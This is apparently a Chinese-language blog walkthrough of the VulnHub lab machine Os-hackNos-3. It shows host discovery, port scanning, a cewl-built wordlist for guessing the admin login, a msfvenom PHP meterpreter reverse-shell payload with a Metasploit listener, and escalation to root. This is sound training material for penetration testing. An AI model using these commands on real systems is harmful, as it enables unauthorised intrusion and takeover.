vulnhub之Os-hackNos-3的實踐
好久沒做攻擊實踐了,今天看了一下,手里還攢著6個vulnhub的鏡像,算了一下,整好春節前把它們都實踐完,今天實踐的是Os-hackNos-3,
用workstation導入成功,但是掃描不出來地址,換成virtualbox,
sudo netdiscover -r 192.168.56.0/24,

接著做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.56.104,

發現有http服務,名字叫WebSec,猜一個url,
http://192.168.56.104/websec/,下面發現個賬戶,

從網頁內容里爬密碼,
sudo cewl http://192.168.56.104/websec/ > passwd.txt,

從頭開始試,到contact@hacknos.com/Securityx時成功,
再猜一個url,http://192.168.56.104/websec/admin,登錄成功,

找到一個能放反彈shell的地方,

在kali攻擊機上生成反彈shell代碼,
sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.106 LPORT=4444 R > shell.php,

把代碼粘到頁面上,保存提交,

在kali攻擊機上開個反彈shell的監聽,
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.56.106
set LPORT 4444
run
在頁面上再次點擊保存,反彈shell就過來了,不是root,需要提權,

先轉成交互式shell,
python -c 'import pty; pty.spawn("/bin/bash")',
發現個blackdevil賬戶,又發現可能是密碼的加密數據,

去https://www.spammimic.com/spreadsheet.php?action=decode上解密,得到blackdevil的密碼,Security@x@,

切換到blackdevil,發現能再直接切到root,搞定,
